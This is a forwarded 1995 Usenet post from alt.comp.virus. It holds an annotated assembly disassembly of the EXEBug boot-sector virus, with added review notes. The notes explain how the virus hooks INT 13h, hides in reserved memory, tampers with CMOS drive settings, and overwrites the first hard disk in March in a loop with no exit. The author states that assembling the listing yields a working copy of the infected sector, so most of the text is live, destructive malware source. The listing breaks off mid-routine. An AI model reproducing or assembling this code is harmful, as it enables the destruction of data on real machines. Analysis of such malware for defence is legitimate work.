
  1. From smtp Tue Feb  7 13:18 EST 1995
  2. Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue,  7 Feb 95 13:18 EST
  3. Received: by lynx.dac.neu.edu (8.6.9/8.6.9) 
  4.      id NAA25457 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:20:39 -0500
  5. Date: Tue, 7 Feb 1995 13:20:39 -0500
  6. From: lynx.dac.neu.edu!ekilby (Eric Kilby)
  7. Content-Length: 44201
  8. Content-Type: binary
  9. Message-Id: <199502071820.NAA25457@lynx.dac.neu.edu>
  10. To: pobox.jwu.edu!joshuaw 
  11. Subject: (fwd) EXEBug
  12. Newsgroups: alt.comp.virus
  13. Status: O
  14.  
  15. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  16. From: danishm@iia.org ()
  17. Newsgroups: alt.comp.virus
  18. Subject: EXEBug
  19. Date: 5 Feb 1995 22:08:52 GMT
  20. Organization: International Internet Association.
  21. Lines: 641
  22. Message-ID: <3h3i9k$v4@ankh.iia.org>
  23. NNTP-Posting-Host: iia.org
  24. X-Newsreader: TIN [version 1.2 PL2]
  25.  
  26. Here is the EXEBug virus (an annotated disassembly of a diskette boot-sector infector with a destructive March payload; the author notes below that assembling it yields a byte-for-byte copy of the infected sector, so treat the listing as live malware):
  27.  
  28. ;-------------------------------------------------------------------------
  29. .286p                                   ; The EXEBUG2 Virus.  This virus
  30. .model tiny                             ; infects diskette boot sectors and
  31. .code                                   ; activates in March of any year,
  32.                                         ; destroying the hard drive.  It
  33.         ORG     0100h                   ; contains instructions for 80286+
  34.                                         ; processors.
  35. ;---------------------------------------;---------------------------------
  36. ; As of Apr 21st, this disassembly is   ; Disassembled with Master Core
  37. ; incomplete, as the test computer uses ;  Disassembler: IQ Software
  38. ; Disk Manager and can not be infected. ; Analyzed with Quaid Analyzer:
  39. ;                                       ;  Quaid Software Ltd.
  40. ;-------------------------------------------------------------------------
  41. ; We are using an origin of 100h, so that this can be assembled with TASM
  42. ; and linked with tlink /t.  You will have a 512 byte .COM file which is
  43. ; a byte-for-byte duplicate of the original boot sector. Note that 100h
  44. ; must be subtracted from many of the offsets.
  45. ;-------------------------------------------------------------------------
      ; REVIEW NOTES (added on top of the original analysis; "listing offset"
      ; below means sector offset + 100h, as explained above):
      ;  * Nothing here is sanitised: assembling the file as described yields
      ;    a working copy of the infected sector.  Treat it as live malware.
      ;  * Install path (011E-0152): DS=SS=0, SP=7C00h; the BIOS memory-size
      ;    word at 0000:0413 (= 0040:0013) is decremented by 1 KB and shifted
      ;    left 6 to make a segment (SAL AX,CL with CL=6).  The INT 13h vector
      ;    at 0000:004C/004E is swapped with the virus's own handler
      ;    (New_Int13_ISR, listing 0232h, outside the part visible here) and
      ;    the previous vector is stored into the sector image at 7CB6h/7CB8h
      ;    BEFORE the image is copied, so the resident copy carries it as
      ;    I13_Off/I13_Seg.  REP MOVSW then copies 106h words (524 bytes) to
      ;    the hidden segment and a RETF lands on Activation inside that copy.
      ;  * Activation (0199): Main_Routine first (CMOS manipulation), then
      ;    INT 1Ah/AH=4; month 03 -> Damage, otherwise INT 19h re-boots with
      ;    the hook still installed.
      ;  * Damage (01A7): masks all eight IRQ lines at port 21h and writes
      ;    17-sector runs to drive 80h through the saved INT 13h vector, heads
      ;    0-7, cylinders up to 1023, without ever testing CF.  The loop has
      ;    no exit.
      ;  * Change_CMOS (01CA): rewrites CMOS bytes 10h (diskette types), 2Fh
      ;    and 2Eh (checksum) through ports 70h/71h; see the notes there for
      ;    the register contract.  The original labels for 2Eh/2Fh are swapped
      ;    (2Eh is the high byte: the CMOS dump later in this file sums to
      ;    027Fh over 10h-2Dh, with 2Eh=02 and 2Fh=7F).
      ;  * 0158-0198 was never analysed by the author and no control flow in
      ;    the visible code enters it.
      ;-------------------------------------------------------------------------
  46.                                         ;Offset Opcode  |Comment
  47.                                         ;---------------------------------
  48. Boot_Start:                             ;00100  EB1C
  49.                                         ;---------------------------------
  50.         JMP     Short Change_RAM        ; Boot sectors always begin with
  51.                                         ; a long jump (E9 XX XX) or a short
  52.                                         ; jump (EB XX 90)
      ;                                       ; EB 1C: 0100 + 2 + 1C = 011E, the
      ;                                       ; Change_RAM label below.
  53.                                         ;---------------------------------
  54.         NOP                             ;00102  90      |NOP for short jump
  55. ;---------------------------------------;               |
  56. ; Data in Code Area                     ;               |
  57. ;---------------------------------------;               |
      ; This is a plain DOS 3.x-style BIOS Parameter Block (sector offsets
      ; 0Bh-1Dh).  The values are those of the sample that was disassembled and
      ; describe a 5.25" double-sided, 9-sector (360 KB) diskette, consistent
      ; with the media byte FDh below.  The BPB ends at 1Dh: Change_RAM starts
      ; at sector offset 1Eh, so there is no DOS 4+ extended BPB (no physical
      ; drive number at 24h, no volume serial/label).
      ;---------------------------------------;               |
  58. OEM     DB      "MSDOS5.0"              ;00103  4D53444F|OEM name
  59. Byt_Sec DW      0200h                   ;0010B  0002    |Bytes per sector
  60. Sct_AlU DB      02h                     ;0010D  02      |Sectors per
  61.                                         ;               | allocation unit
  62. RsvdSct DW      0001h                   ;0010E  0100    |Reserved sectors
  63. NumFATs DB      02h                     ;00110  02      |Number of FATs
  64. RootSiz DW      0070h                   ;00111  7000    |Number of root dir
  65.                                         ;               | entries (112)
  66. TotSect DW      02D0h                   ;00113  D002    |Total sectors in
  67.                                         ;               | volume (02D0h = 720,
      ;                                       ;               | i.e. 360 KB -- the
      ;                                       ;               | original said 1440)
  68. MedDesc DB      0FDh                    ;00115  FD      |Media descriptor
  69.                                         ;               | byte:
  70.                                         ;---------------------------------
  71.                                         ;  F8 = hard disk
  72.                                         ;  F0 = 3½" 18 sector
  73.                                         ;  F9 = 3½"  9 sector
  74.                                         ;  F9 = 5¼" 15 sector
  75.                                         ;  FC = 5¼" SS 9 sector
  76.                                         ;  FD = 5¼" DS 9 sector
  77.                                         ;  FE = 5¼" SS 8 sector
  78.                                         ;  FF = 5¼" DS 8 sector
  79.                                         ;---------------------------------
  80. FATSect DW      0002h                   ;00116  0200    |Sectors per FAT
  81. Sct_Trk DW      0009h                   ;00118  0900    |Sectors per track
  82. NumHead DW      0002h                   ;0011A  0200    |Number of heads
  83. aDrvNum DW      0000h                   ;0011C  0000    |Hidden sectors (BPB
      ;                                       ;               | offset 1Ch).  The
      ;                                       ;               | label is misleading:
      ;                                       ;               | a drive-number byte
      ;                                       ;               | only exists at 24h in
      ;                                       ;               | an extended BPB,
      ;                                       ;               | which this sector
      ;                                       ;               | does not carry.
  84. ;---------------------------------------;---------------------------------
  85.                                         ;               |
  86. Change_RAM:                             ;               |
      ;---------------------------------------;---------------------------------
      ; Entry from the BIOS bootstrap: this sector is at 0000:7C00 and runs
      ; with CS:IP = 0000:7C00 (the JMP at 0100 lands here).  What follows
      ; steals 1 KB below the top of conventional memory, hooks INT 13h, copies
      ; the sector there and jumps into the copy.  No CLI is issued anywhere in
      ; this sequence; nothing visible depends on the interrupt flag.
      ;---------------------------------------;---------------------------------
  87.                                         ;               |
  88.         XOR     AX,AX                   ;0011E  33C0    |Zero register
  89.         MOV     DS,AX                   ;00120  8ED8    |DS = 0000
  90.         MOV     DI,AX                   ;00122  8BF8    |DI = 0000
  91.         MOV     SS,AX                   ;00124  8ED0    |SS = 0000
  92.         MOV     SP,7C00h                ;00126  BC007C  |SP = 7C00
  93.                                         ;---------------------------------
  94.                                         ; Get RAM size in KB (640 = 280h
  95.                                         ; on a full machine) into AX.
  96. Get_RAM_Size:                           ;---------------------------------
  97.                                         ;               |
  98.         MOV     AX,Word Ptr DS:[0413h]  ;00129  A11304  |0000:0413 holds
  99.                                         ;               | RAM size
       ;                                       ;               | (= BIOS data area
       ;                                       ;               | word 0040:0013)
  100.         MOV     CX,0106h                ;0012C  B90601  |This does two things:
  101.                                         ;               |it sets up a MOVSW,
  102.                                         ;               |and it puts a 6 in
  103.                                         ;               |CL for the SAL,CL
  104.         DEC     AX                      ;0012F  48      |Steal 1K of RAM
  105.                                         ;               | (decrease RAM size)
  106.         MOV     SI,SP                   ;00130  8BF4    |SI is 7C00. Use to
  107.                                         ;               | move boot sector
  108.                                         ;               | in Copy_Boot routine.
  109.                                         ;---------------------------------
  110.                                         ; RAM size is now 1K less; put it
  111.                                         ; in DS:0413h (RAMsize)
  112. Put_RAM_Size:                           ;---------------------------------
  113.                                         ;               |
  114.         MOV     Word Ptr DS:[0413h],AX  ;00132  A31304  |Put the new RAM
  115.                                         ;               | size back in [0413]
       ;                                       ;               | DOS will later see
       ;                                       ;               | 1 KB less and leave
       ;                                       ;               | the copy alone.
  116.         SAL     AX,CL                   ;00135  D3E0    |Convert to paragraphs
       ;                                       ;               | (KB << 6 = segment)
  117. ;-------------------------------------------------------------------------
  118. ; AX now holds the SEGMENT of the new Int 13 service routine at TOM - 1K.
  119. ; Next operation exchanges this with the old Int 13 segment stored at 0000:004E.
  120. ;-------------------------------------------------------------------------
  121.                                         ;               |
  122.         MOV     ES,AX                   ;00137  8EC0    |ES = new area SEGMENT
  123.         PUSH    AX                      ;00139  50      |Save SEGMENT address
  124.                                         ;               | on stack. Jump here
  125.                                         ;               | at offset 0152.
  126.         XCHG    AX,DS:[004Eh]           ;0013A  87064E00|Exchange new and old
  127.                                         ;               | SEGMENTS
       ;                                       ;               | (IVT entry 13h is
       ;                                       ;               | 0000:004C offset,
       ;                                       ;               | 0000:004E segment)
  128.                                         ;---------------------------------
  129.  
  130.         MOV     Word Ptr DS:[7C00h+offset I13_Seg - 100h],AX
  131.  
  132.                                         ;---------------------------------
  133.                                         ;0013E  A3B87C  |This really should be:
  134.                                         ;               |[7C00h+offset I13_Seg],
  135.                                         ;               |but we use an ORG of
  136.                                         ;               |100h here.
  137.                                         ;      <Store old SEGMENT at 7CB8>
       ;                                       ; The store goes into the sector
       ;                                       ; image still sitting at 7C00h;
       ;                                       ; the copy made at 0150 below
       ;                                       ; therefore carries the previous
       ;                                       ; vector in its own I13_Seg/
       ;                                       ; I13_Off cells.
  138.                                         ;---------------------------------
  139.  
  140.         MOV     AX,offset New_Int13_ISR - 100h
  141.  
  142.                                         ;---------------------------------
  143.                                         ;00141  B83201  |Likewise the offset
  144.                                         ;               |of the new Int 13
  145.                                         ;               |service routine is
  146.                                         ;               |decremented by 100h
  147. ;------------------------------------------------------------------------
  148. ; AX now holds the OFFSET of the new Int 13 service routine, which is
  149. ; in our code at offset 232h.  Next operation exchanges this with the
  150. ; the offset stored at 0000:004C.
       ; (New_Int13_ISR itself is past the end of the part of the listing
       ; visible here.)
  151. ;------------------------------------------------------------------------
  152.                                         ;               |
  153.         XCHG    AX,DS:[004Ch]           ;00144  87064C00|Exchange new and old
  154.                                         ;               | OFFSETS
  155.                                         ;---------------------------------
  156.  
  157.         MOV     Word Ptr DS:[7C00h+offset I13_Off - 100h],AX
  158.  
  159.                                         ;---------------------------------
  160.                                         ;00148  A3B67C  |Again, decrement by
  161.                                         ;               | 100h to compensate
  162.                                         ;               | for ORG 100h
  163.                                         ;      <Store old OFFSET at 7CB6>
  164.                                         ;---------------------------------
  165.  
  166.         MOV     AX,[offset Activation - 100h]
  167.  
  168.                                         ;---------------------------------
  169.                                         ;0014B  B89900  |Move offset of
  170.                                         ;               |Activation routine
  171.                                         ;               |to AX.
       ;                                       ;               |(B8 = immediate MOV;
       ;                                       ;               |the brackets do not
       ;                                       ;               |make it a memory
       ;                                       ;               |read.)  AX is still
       ;                                       ;               |0099h when Activation
       ;                                       ;               |runs -- Main_Routine
       ;                                       ;               |hands that AX (AH=0)
       ;                                       ;               |to Change_CMOS.
  172.         PUSH    AX                      ;0014E  50      |Push the Activation
  173.                                         ;               |address, and then
  174.                                         ;               |use that as the
  175.                                         ;               |OFFSET when we RETF
  176.                                         ;               |at offset 0152.
  177. Copy_Boot:                              ;---------------------------------
  178.                                         ;               |
  179.         CLD                             ;0014F  FC      |Forward direction for
  180.                                         ;               |the MOVSW: cx=0106h
  181.                                         ;               |ds=0000h sp=7C00h
  182.                                         ;               |si=7C00h di=0000h
  183.                                         ;               |REP MOVSW runs exactly
  184.                                         ;               |CX times; ZF is NOT
  185.                                         ;               |consulted (only REPE/
       ;                                       ;               |REPNE with CMPS/SCAS
       ;                                       ;               |look at it).
  186.         REP     MOVSW                   ;00150  F3A5    |MOVE DS:SI TO ES:DI
       ;                                       ;               |106h = 262 words =
       ;                                       ;               |524 bytes: the whole
       ;                                       ;               |512-byte sector plus
       ;                                       ;               |12 bytes past 7E00h.
       ;                                       ;               |Destination is
       ;                                       ;               |newseg:0000, so a
       ;                                       ;               |listing offset X
       ;                                       ;               |lives at X-100h in
       ;                                       ;               |the resident copy.
       ;                                       ;               |CX is 0 afterwards;
       ;                                       ;               |Main_Routine's
       ;                                       ;               |MOV ES,CX at 0206h
       ;                                       ;               |(commented "Zero
       ;                                       ;               |ES") gets its zero
       ;                                       ;               |from here.
  187.                                         ;---------------------------------
  188.                                         ; Move virus up to the memory we have
  189.                                         ; allocated, and set the INT handler.
  190.                                         ;---------------------------------
  191.                                         ;               |
  192.         RETF                            ;00152  CB      |The segment and
  193.                                         ;               |offset of the
  194.                                         ;               |Activation routine
  195.                                         ;               |were pushed on the
  196.                                         ;               |stack previously, so
  197.                                         ;               |a RETF jumps there
  198.                                         ;               |(at top of memory)
       ;                                       ;               |Stack at this point:
       ;                                       ;               |[SP]   = 0099h (IP,
       ;                                       ;               |         pushed 014E)
       ;                                       ;               |[SP+2] = newseg (CS,
       ;                                       ;               |         pushed 0139)
       ;                                       ;               |After the RETF SP is
       ;                                       ;               |back at 7C00h, DS and
       ;                                       ;               |SS are still 0.
  199.                                         ;>>>>>>>>>>>>>>>|JUMP TO ACTIVATION
  200. ;---------------------------------------;---------------------------------
  201.                                         ;               |
       ;---------------------------------------;---------------------------------
       ; Resident data.  Xchg_Old_New (01F4) and CMOS_1 (0211/0215) address
       ; these cells as DS:[0053h], DS:[0054h] and DS:[0055h], i.e. listing
       ; offsets 0153h-0155h minus 100h, with DS pointing at the resident copy.
       ;---------------------------------------;---------------------------------
  202.         DB      04h                     ;00153  04      |Low byte of the word
       ;                                       ;               | that XCHG AX,[0053h]
       ;                                       ;               | swaps with AX.  Only
       ;                                       ;               | AH (= Drive) matters
       ;                                       ;               | to Change_CMOS, so
       ;                                       ;               | this byte is scratch
       ;                                       ;               | and gets overwritten
       ;                                       ;               | by whatever AL holds.
  203. Drive   DB      20h                     ;00154  20      |CMOS drive type (AH),
  204.                                         ;               | is stored here.
       ;                                       ;               | (CMOS byte 10h as
       ;                                       ;               | read by Change_CMOS;
       ;                                       ;               | 20h = one 1.2 MB
       ;                                       ;               | drive A: in the
       ;                                       ;               | sampled machine.)
  205. ChkSum  DW      046Ch                   ;00155  6C04    |CMOS checksum (DX),
  206.                                         ;               | is stored here.
       ;                                       ;               | (DH = CMOS 2Eh, DL =
       ;                                       ;               | CMOS 2Fh, in the
       ;                                       ;               | order Change_CMOS
       ;                                       ;               | returns them.)
  207. Install DB      01h                     ;00157  01      |This byte is checked
  208.                                         ;               | at offset 294. It is
  209.                                         ;               | used for the value
  210.                                         ;               | of CX when the boot
  211.                                         ;               | record is written
  212.                                         ;               | (starting sector)
  213.                                         ;               | Values are 1 or 11h.
       ;                                       ;               | (Offset 294 is past
       ;                                       ;               | the visible part of
       ;                                       ;               | the listing; this
       ;                                       ;               | is the author's
       ;                                       ;               | claim, unverified
       ;                                       ;               | here.)
  214. ;-------------------------------------------------------------------------
  215. ; The code (or is it data?) below from offsets 0158 to 0198 is not analyzed,
  216. ; as I could not get an infection on the test computer.
       ;
       ; REVIEW: treat the instruction stream below as the disassembler's guess,
       ; not as verified code.  Observations from the visible listing only:
       ;  * No JMP/CALL in the visible code targets 0158-0198, and the RETF at
       ;    0152 cannot fall into it (0153-0157 are data).  The only reference
       ;    is the internal JZ at 018C.  Code past 0232h is not visible here,
       ;    so an entry from there cannot be excluded.
       ;  * The opening bytes 28 28 00 01 02 decode to degenerate memory
       ;    operations through [BX+SI]/[BX+DI], which is what a table of data
       ;    usually looks like when disassembled.
       ;  * CALL $-170h (E8 8D FE at 0175) would transfer to 0005 in the
       ;    listing frame, i.e. 0FBh bytes BEFORE the sector's own start
       ;    (7B05h when loaded at 7C00h); that is not plausible code.
       ;  * The absolute operands 01B8h/01B6h at 017C/0185 coincide numerically
       ;    with the listing offsets of I13_Seg/I13_Off, but since the sector is
       ;    assembled with ORG 100h those cells are at real offsets 00B8h/00B6h;
       ;    as encoded, the stores hit real 01B8h/01B6h (listing 02B8h/02B6h,
       ;    inside the unseen INT 13h handler area).
  217. ;-------------------------------------------------------------------------
  218.         SUB     [BX+SI],CH              ;00158  2828    |
  219.         ADD     [BX+DI],AL              ;0015A  0001    |
  220.         ADD     AL,[BP+1Eh]             ;0015C  02461E
  221.                                         ;  ADD AL,[BP+offset Change_RAM-100h]
       ;                                       ;  (the disassembler's symbolic
       ;                                       ;   guess for the constant 1Eh)
  222.         PUSH    CX                      ;0015F  51      |
  223.         MOV     DL,65h                  ;00160  B265    |
  224.         MOV     DI,DX                   ;00162  8BFA    |
  225.         DEC     AL                      ;00164  FEC8    |
  226.         STOSW                           ;00166  AB      |STORE Word STRING
  227.                                         ;               | FROM AX
  228.         ADD     DI,+04h                 ;00167  83C704  |
  229.         XOR     AL,0C0h                 ;0016A  34C0    |
  230.         STOSW                           ;0016C  AB      |
  231.         MOV     CL,0Bh                  ;0016D  B10B    |cl=0Bh dl=65h
  232.         REP     STOSB                   ;0016F  F3AA    |STORE 0Bh Bytes
  233.                                         ;               | STRING FROM AL
  234.         MOV     CL,13h                  ;00171  B113    |
  235.         MOV     BH,03h                  ;00173  B703    |
  236.         CALL    $-170h                  ;00175  E88DFE  |This calls offset
  237.                                         ;               |7B05 in this segment.
       ;                                       ;               |(i.e. before the
       ;                                       ;               | sector itself --
       ;                                       ;               | see note above)
  238.         MOV     AH,13h                  ;00178  B413    |
  239.         INT     2Fh                     ;0017A  CD2F    |Get & set DOS disk
  240.                                         ;               |int handler
  241.                                         ;               |ds:dx=new handler,
  242.                                         ;               |es:bx=old
       ;                                       ;               |(DOS multiplex
       ;                                       ;               | AH=13h does exist
       ;                                       ;               | with that register
       ;                                       ;               | usage, but whether
       ;                                       ;               | this is executed is
       ;                                       ;               | not established.)
  243.         MOV     CS:[01B8h],DS           ;0017C  2E8C1E  |
  244.                                         ;       B801    |
  245.                                         ;               |
  246.         MOV     CX,DX                   ;00181  8BCA    |
  247.         INT     2Fh                     ;00183  CD2F    |Set it again
  248.         MOV     DS:[01B6h],CX           ;00185  890EB601|
  249.         CMP     CL,32h                  ;00189  80F932  |
  250.         JZ      H0000_0198              ;0018C  740A    |Return if CL=32h
  251.         MOV     CX,CS                   ;0018E  8CC9    |
  252.         ADD     CX,+10h                 ;00190  83C110  |
  253.         PUSH    CX                      ;00193  51      |
  254.         MOV     AX,00FDh                ;00194  B8FD00  |
  255.         PUSH    AX                      ;00197  50      |
  256.                                         ;               |
  257. H0000_0198:                             ;---------------------------------
  258.                                         ;               |
  259.         RETF                            ;00198  CB      |
       ;                                       ;               |(Falls through from
       ;                                       ;               | 0197 with CS+10h:
       ;                                       ;               | 00FDh pushed -- if
       ;                                       ;               | this is real code,
       ;                                       ;               | that is a far jump
       ;                                       ;               | to the next 256
       ;                                       ;               | bytes of the resident
       ;                                       ;               | image.  Unverified.)
  260. ;---------------------------------------;---------------------------------
  261.                                         ;               |
  262. Activation:                             ;               |
       ;---------------------------------------;---------------------------------
       ; Reached by the RETF at 0152, now executing in the resident copy.
       ; Register state established by the boot code: CS = hidden segment,
       ; DS = SS = 0, SP = 7C00h, AX = 0099h (from 014B), CX = 0 (REP MOVSW
       ; exhausted it), DI = 20Ch, ES = hidden segment.  DX is whatever the
       ; BIOS left in it (not set by any visible instruction).
       ;---------------------------------------;---------------------------------
  263.                                         ;               |
  264.         CALL    Main_Routine            ;00199  E86800  |
       ;                                       ;               |0204h: sets DS=CS,
       ;                                       ;               |ES=CX and rewrites
       ;                                       ;               |CMOS 10h/2Eh/2Fh
       ;                                       ;               |with AH/DL/DH, i.e.
       ;                                       ;               |zeroes the diskette
       ;                                       ;               |type when AH=0.
       ;                                       ;               |This runs on EVERY
       ;                                       ;               |boot, before the
       ;                                       ;               |date test below.
  265.         MOV     AH,04h                  ;0019C  B404    |AH=4 (get date)
  266.         INT     1Ah                     ;0019E  CD1A    |Get date
  267.                                         ;               |CX=year, DX=mon/day
       ;                                       ;               |(CH=century CL=year
       ;                                       ;               | DH=month DL=day, BCD
       ;                                       ;               | on the standard AT
       ;                                       ;               | BIOS, which is why
       ;                                       ;               | 03h is compared.
       ;                                       ;               | CF = clock stopped
       ;                                       ;               | is never checked.)
  268.         CMP     DH,03h                  ;001A0  80FE03  |Is it month #3
  269.         JZ      Damage                  ;001A3  7402    |If it is March,
  270.                                         ;               | do damage
  271.         INT     19h                     ;001A5  CD19    |Otherwise reboot
  272.                                         ;               | with virus resident
  273.                                         ;               | and Int 13 hooked
       ;                                       ;               |The bootstrap loader
       ;                                       ;               |reads the next boot
       ;                                       ;               |sector through INT
       ;                                       ;               |13h, i.e. through
       ;                                       ;               |the hook installed
       ;                                       ;               |at 013A/0144; the
       ;                                       ;               |copy above the
       ;                                       ;               |lowered 0413h size
       ;                                       ;               |survives the reboot.
  274. ;---------------------------------------;---------------------------------
  275.                                         ; Payload: overwrite the first
  276. Damage:                                 ;  hard disk.  The far CALL below
  277.                                         ;  goes through I13_Off:I13_Seg,
       ;                                       ;  which holds the vector SAVED
       ;                                       ;  at install time (013E/0148),
       ;                                       ;  not the virus's own handler --
       ;                                       ;  so neither the virus hook nor
       ;                                       ;  anything hooked later sees
       ;                                       ;  these writes.
       ;                                       ;---------------------------------
  278.         MOV     AL,0FFh                 ;001A7  B0FF    |
  279.         OUT     21h,AL                  ;001A9  E621    |Mask all 8 IRQ lines
       ;                                       ;               | at the master PIC
       ;                                       ;               | (timer and keyboard
       ;                                       ;               | included), so no
       ;                                       ;               | keyboard-driven way
       ;                                       ;               | out of the loop.
  280.         MOV     DX,0080h                ;001AB  BA8000  |DH = head # (0),
  281.                                         ;               |DL = drive #
  282.                                         ;               |  (+80 for hd)
  283.         MOV     CX,0101h                ;001AE  B90101  |CH = cylinder #,
  284.                                         ;               |CL = sector #
       ;                                       ;               |Starts at cylinder 1;
       ;                                       ;               |cylinder 0 (MBR and
       ;                                       ;               |partition table) is
       ;                                       ;               |reached only after
       ;                                       ;               |CL wraps (see 01C5).
       ;                                       ;               |ES:BX (the buffer)
       ;                                       ;               |is never set: the
       ;                                       ;               |writes take whatever
       ;                                       ;               |they point at.
  285. Trash_HardDrive:                        ;---------------------------------
  286.                                         ;               |
  287.         MOV     AX,0311h                ;001B1  B81103  |AH = function 03
  288.                                         ;               | (write sectors)
  289.                                         ;               |AL = # of sectors
       ;                                       ;               | (11h = 17 per call)
  290.         PUSHF                           ;001B4  9C      |Push flags: normally
  291.                                         ;               | done prior to
  292.                                         ;               | interrupt.
  293. FarCall DB      9Ah                     ;001B5  9A      |Call the Int 13
  294.                                         ;               | service routine
       ;                                       ;               | 9A + the two words
       ;                                       ;               | below = CALL FAR
       ;                                       ;               | seg:off; the target
       ;                                       ;               | is patched in place
       ;                                       ;               | (self-modifying).
  295. I13_Off DW      0AB1Bh                  ;001B6  1BAB    |(real) Int 13 offset
  296. I13_Seg DW      0F000h                  ;001B8  00F0    |(real) Int 13 segment
       ;                                       ;               |F000:AB1B is just the
       ;                                       ;               |value in the sample;
       ;                                       ;               |the install code
       ;                                       ;               |overwrites both with
       ;                                       ;               |whatever the IVT held.
  297.         INC     DH                      ;001BA  FEC6    |Next head
  298.         AND     DH,07h                  ;001BC  80E607  |Keep bits 0-2 of DH
  299.                                         ;               | (heads 0-7), clear
       ;                                       ;               | bits 3-7
  300.         JNZ     Trash_HardDrive         ;001BF  75F0    |Loop while head != 0;
  301.                                         ;               |on wrap fall through
       ;                                       ;               |to the next cylinder
  302.         INC     CH                      ;001C1  FEC5    |Next cylinder
  303.         JNZ     Trash_HardDrive         ;001C3  75EC    |Loop while CH != 0;
  304.                                         ;               | after cylinder 255
  305.                                         ;               | fall through.
  306.         ADD     CL,40h                  ;001C5  80C140  |Bump the cylinder's
  307.                                         ;               | high bits 8-9, which
  308.                                         ;               | INT 13h keeps in CL
  309.                                         ;               | bits 6-7: covers
  310.                                         ;               | cylinders 0-1023.
       ;                                       ;               | C1h+40h wraps CL to
       ;                                       ;               | 01h with CH=0, so
       ;                                       ;               | cylinder 0 is hit
       ;                                       ;               | last, then it all
       ;                                       ;               | starts over.
  311.         JMP     Short Trash_HardDrive   ;001C8  EBE7    |Unconditional; CF from
  312.                                         ;               | the write is never
  313.                                         ;               | tested, so a disk
       ;                                       ;               | error does not end
       ;                                       ;               | the loop either --
       ;                                       ;               | only reset/power off.
  314. ;--------------------------------------------------------------------------
  315.                                         ;Register contract (derived from
  316. Change_CMOS:                            ; the three XCHGs below):
  317.                                         ; writes AH -> CMOS 10h, DL -> 2Fh,
  318.                                         ; DH -> 2Eh and returns the previous
       ;                                       ; contents in the same places:
       ;                                       ; AH = old 10h, DL = old 2Fh,
       ;                                       ; DH = old 2Eh (DX = old checksum
       ;                                       ; in natural high:low order).
       ;                                       ; Calling it twice with the values
       ;                                       ; it returned is therefore a no-op,
       ;                                       ; which Restore_CMOS exploits.
       ;                                       ; Clobbers AL; no flags changed.
       ;                                       ; Saved copies live at DS:[0054]
       ;                                       ; (type) and DS:[0055] (checksum),
       ;                                       ; see Drive/ChkSum at 0154/0155.
       ;                                       ; NOTE: 2Eh is the HIGH and 2Fh the
       ;                                       ; LOW checksum byte -- the CMOS
       ;                                       ; dump later in this file sums to
       ;                                       ; 027Fh over bytes 10h-2Dh, with
       ;                                       ; 2Eh=02 and 2Fh=7F.  The original
       ;                                       ; labels below had them swapped.
  319. ;--------------------------------------------------------------------------
  320.         MOV     AL,10h                  ;001CA  B010    |Diskette type
  321.         CALL    CMOS_Read_Write         ;001CC  E80700  | SET DISKETTE TYPE
       ;                                       ;               | (writes entry AH;
       ;                                       ;               |  with AH=0 the BIOS
       ;                                       ;               |  will see no floppy
       ;                                       ;                  drives at all)
  322.         MOV     AL,2Fh                  ;001CF  B02F    |Low checksum byte
  323.         CALL    CMOS_Read_Write         ;001D1  E80200  | SET CHECKSUM: set
  324.                                         ;               | to zero or restore
       ;                                       ;               | (writes entry DL)
  325.         MOV     AL,2Eh                  ;001D4  B02E    |High checksum byte
  326.                                         ;               | SET CHECKSUM: set
  327.                                         ;               | to zero or restore
       ;                                       ;               | (writes entry DH).
       ;                                       ;               | No CALL here: it
       ;                                       ;               | falls into the
       ;                                       ;               | subroutine and that
       ;                                       ;               | RET returns to
       ;                                       ;               | Change_CMOS's caller.
  328. CMOS_Read_Write:                        ;---------------------------------
       ;                                       ; One CMOS exchange: AL = index.
       ;                                       ; Rotates AH -> (written), DL -> AH,
       ;                                       ; DH -> DL, old value -> DH.
       ;                                       ; The per-call traces below are the
       ;                                       ; author's, from one run: calls 1-3
       ;                                       ; are the zeroing pass (AH=DL=DH=0
       ;                                       ; on entry, CMOS 10h=20h, checksum
       ;                                       ; 027Fh read back).  Calls 4-6
       ;                                       ; write 10h=00, 2Fh=5Fh, 2Eh=02h:
       ;                                       ; 025Fh is 027Fh minus the 20h
       ;                                       ; drive-type byte, i.e. a checksum
       ;                                       ; recomputed for the "no diskette
       ;                                       ; drive" state -- consistent with
       ;                                       ; a Calc_ChkSum step that lies
       ;                                       ; outside this view.  Unverified.
  329.                                         ;               |
  330.         OUT     70h,AL                  ;001D6  E670    |Tell CMOS address
  331.                                         ;               |  to read (in AL)
       ;                                       ;               | (bit 7 of this
       ;                                       ;               |  byte is the NMI
       ;                                       ;               |  disable on AT
       ;                                       ;                  hardware; clear
       ;                                       ;                  for all three
       ;                                       ;                  indexes used)
  332.         XCHG    AH,DL                   ;001D8  86E2    |1st call: AH=DL=00
  333.                                         ;               |2nd call: AH=DL=00
  334.                                         ;               |3rd call: AH=20,DL=00
  335.                                         ;               |4th call: AH=5F,DL=00
  336.                                         ;               |5th call: AH=02,DL=5F
  337.                                         ;               |6th call: AH=00,DL=02
  338.                                         ;               |
  339.         XCHG    DL,DH                   ;001DA  86D6    |1st call: DH=DL=00
  340.                                         ;               |2nd call: DH=00,DL=20
  341.                                         ;               |3rd call: DH=00,DL=7F
  342.                                         ;               |4th call: DH=00,DL=02
  343.                                         ;               |5th call: DH=5F,DL=00
  344.                                         ;               |6th call: DH=02,DL=00
  345.                                         ;               |
  346.         IN      AL,71h                  ;001DC  E471    |Read CMOS to AL
  347.                                         ;               |1st call: AL=20
  348.                                         ;               |2nd call: AL=7F
  349.                                         ;               |3rd call: AL=02
  350.                                         ;               |4th call: AL=00
  351.                                         ;               |5th call: AL=00
  352.                                         ;               |6th call: AL=00
  353.                                         ;               |
  354.         XCHG    DH,AL                   ;001DE  86F0    |Trade AL <-> DH
       ;                                       ;               |(old value kept in
       ;                                       ;               | DH, entry AH now
       ;                                       ;               | in AL to be written)
  355.                                         ;               |1st call: DH=20,AL=00
  356.                                         ;               |2nd call: DH=7F,AL=00
  357.                                         ;               |3rd call: DH=02,AL=00
  358.                                         ;               |4th call: DH=00,AL=00
  359.                                         ;               |5th call: DH=00,AL=5F
  360.                                         ;               |6th call: DH=00,AL=02
  361.                                         ;               |
  362.         OUT     71h,AL                  ;001E0  E671    |Write contents of
  363.                                         ;               |  AL to CMOS
       ;                                       ;               |  (index latched by
       ;                                       ;                  the OUT 70h above)
  364.                                         ;               |1st call: AL=00
  365.                                         ;               |2nd call: AL=00
